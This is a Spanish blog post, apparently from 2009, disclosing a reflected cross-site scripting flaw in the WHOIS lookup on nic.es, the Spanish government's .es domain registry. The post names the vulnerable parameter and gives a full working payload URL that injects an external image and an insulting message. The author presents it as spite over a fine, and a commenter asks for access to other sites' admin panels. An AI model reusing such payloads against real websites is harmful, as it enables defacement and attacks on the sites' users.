May 05

XSS en “www.nic.es” (Web de dominios .es del gobierno)

Bug, Gobierno, Seguridad, Uncategorized, xss Add comments

Bien, aquí les muestro un XSS en la web de NIC (Es la empresa oficial de dominios del gobierno de españa)

El XSS se encuentra en cuando se quiere hacer un WHOIS a un dominio

https://www.nic.es/esnic/esn/verValidacionWhoisAction?dominio=[XSS]

Por ejemplo:

https://www.nic.es/esnic/esn/verValidacionWhoisAction?dominio=”><br><img border=”0″ src=”http://i214.photobucket.com/albums/cc173/dimitrix-es/XSS and Others/DimitrixHack.png” width=”493″ height=”371″><big>PUTA LEY!

Diría que no es nada personal, pero quizás sea por la multa de medio millón de pesetas que me han puesto :P

Clickea en la imagen para hacerla en grande.

4 Responses to “XSS en “www.nic.es” (Web de dominios .es del gobierno)”

  1. sod dice:
    Mayo 11, 2009 en 11:04 pm

    medio quilo? O_O madre mia que has hecho?
    Saludos

  2. uno, dos tres dice:
    Julio 7, 2009 en 7:33 pm

    JAJA espero ke sea un montaje!! xD

  3. =) felicidades dice:
    Agosto 7, 2010 en 5:10 pm

    eres grande eres el mejor

  4. =) felicidades dice:
    Agosto 7, 2010 en 5:12 pm

    nos podrias dar el acceso a los paneles de administracion de algunas web porfavor te lo agradeceria hasta la muerte ejej

Leave a Reply

preload preload preload